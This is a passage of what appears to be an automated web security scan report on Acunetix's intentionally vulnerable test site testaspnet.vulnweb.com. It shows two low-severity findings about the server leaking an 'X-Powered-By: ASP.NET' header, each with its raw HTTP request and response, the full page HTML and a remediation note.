          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        36. POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (456 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2
          Content-Length: 10985
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (10985 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 30486
          
          
          Response body (30486 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKx7LcVArvjq48MAu2JnvwLAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC+KQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w8CjfeklgcCjfeklgcCjffYKgKN99gqAo33jJINAo33jJINAo33oKkGAo33oKkGAuads94JAuads94JAuadp/UCAuadp/UCAuad24kKAuad24kKAuadz6wDAuadz6wDAuad48MMAuad48MMAuadl+YFAuadl+YFAuadi70NAuadi70NAuadv9AGAuadv9AGAuadk7kDAuadk7kDAuadh9wMAuadh9wMAvukkcUPAvukkcUPAvukhZgHAvukhZgHAvukuT8C+6S5PwL7pK3SCQL7pK3SCQL7pMH2AgL7pMH2AgL7pPWNCgL7pPWNCgL7pOmgAwL7pOmgAwL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DyY4AmtQ6l9yclXqngVcemir9JWK" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix                            Web Vulnerability Scanner 2 </strong></p>                           <p>21 July 2005 - <strong>Start-up company Acunetix released                            Acunetix Web Vulnerability Scanner: a tool to automatically                            audit website security. Acunetix Web Vulnerability Scanner                            2 crawls an entire website, launches popular web attacks                            (SQL Injection etc.) and identifies vulnerabilities                            that need to be fixed.</strong> </p>                           <p><strong>Securing your website should be your number one                            concern</strong><br />                           Hackers are concentrating their efforts on web-based                            applications - 75% of cyber attacks are done at the                            web application level, a Gartner Group study has revealed.                            Web applications are accessible 24 hours a day, 7 days                            a week and control valuable data such as customer information,                            transaction information and even proprietary corporate                            data.</p>                           <p><strong>500,000 customer credit card numbers obtained via                            a web attack</strong><br />                           Well-known sites that were open to web application attacks                            include fashion label Guess and pet supply retailer                            PetCo.com who were notoriously found to be vulnerable                            to the SQL injection vulnerability (June 2003). 
This                            resulted in PetCo leaving as many as 500,000 credit                            card numbers open to anyone able to construct this specially-crafted                            URL.</p>                           <p><strong>Firewalls, SSL and locked-down servers are futile                            against web application hacking</strong><br />                           Any defense at network security level will provide no                            protection against web application attacks since they                            are launched on port 80 - which has to remain open.                            In addition, web applications (customer areas, shopping                            carts etc.) are often tailor-made, invariably tested                            less than off-the-shelf software and are therefore more                            susceptible to attack.</p>                           <p>&quot;Companies have implemented network-level security,                            however they fail to audit and secure their web applications.                            These applications have access to sensitive data and                            are a hacker's prime target,&quot; said Nick Galea,                            CEO of Acunetix. &quot;Auditing one's web apps should                            be the number one security concern.&quot;</p>                           <p><strong>The need for an automated web application vulnerability                            scanner</strong><br />                           Manually auditing a web application for vulnerabilities                            to SQL injection, cross site scripting and other web                            attacks is virtually impossible. With Acunetix Web Vulnerability                            Scanner the process of auditing web applications such                            as shopping carts and forms, can be easily automated.                            
What's more, the security checks can easily be re-launched                            for each application update.</p>                           <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br />                           Acunetix WVS first crawls the whole website, analyzes                            in-depth each file it finds, and displays the entire                            website structure. After this discovery stage, it performs                            an automatic audit for common security vulnerabilities.</p>                           <p><strong>Automatically detects SQL injection, cross site                            scripting and other web vulnerabilities</strong><br />                           SQL injection is a hacking technique which modifies                            SQL commands in order to gain access to data in the                            database. Cross site scripting attacks allow a hacker                            to execute a malicious script on your visitors' browser.                            Acunetix Web Vulnerability Scanner can check if your                            web application is vulnerable to both of these attacks.                            
More information about cross site scripting &amp; SQL                            injection at our website security info page.</p>                           <p><strong>Acunetix Web Vulnerability Scanner also checks for                            the following web attacks:</strong></p>                           <ul> <li>CRLF injection attacks<br />                           </li><li>Code execution attacks<br />                           </li><li>Directory traversal attacks<br />                           </li><li>File inclusion attacks<br />                           </li><li> Input validation attacks<br />                           </li><li>Authentication attacks.</li> </ul>                           <p><strong>Advanced penetration testing tools</strong><br />                           Acunetix WVS also includes tools such as an HTTP editor                            &amp; HTTP sniffer to allow customization of web vulnerability                            checks. Using the Vulnerability editor, new attacks                            can easily be created.</p>                           <p><strong>Pricing &amp; availability</strong><br />                           Acunetix WVS is available as an enterprise or as a consultant                            version. A subscription based license can be purchased                            for as little as $395, whereas a perpetual license starts                            at $2995. For more information visit our pricing page.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. 
Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        37. POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=3
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (455 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3
          Content-Length: 3761
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (3761 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 17924
          
          
          Response body (17924 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=3" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:37:35 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently,                            therefore it is not recommended that the same beta version                            is used for more than 30 days. To beta-test beyond 30                            days, users should install the latest beta version or,                            if available, use the release version.</p>                           <p><strong>About Acunetix Web Vulnerability Scanner</strong><br />                           Acunetix Web Vulnerability Scanner, a unique web application                            scanning product that makes securing one&rsquo;s website                            easier than ever. Acunetix Web Vulnerability Scanner                            is an automated web application security testing tool                            that crawls an entire website and attacks it so as to                            identify potential weaknesses before hackers do. Further                            information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
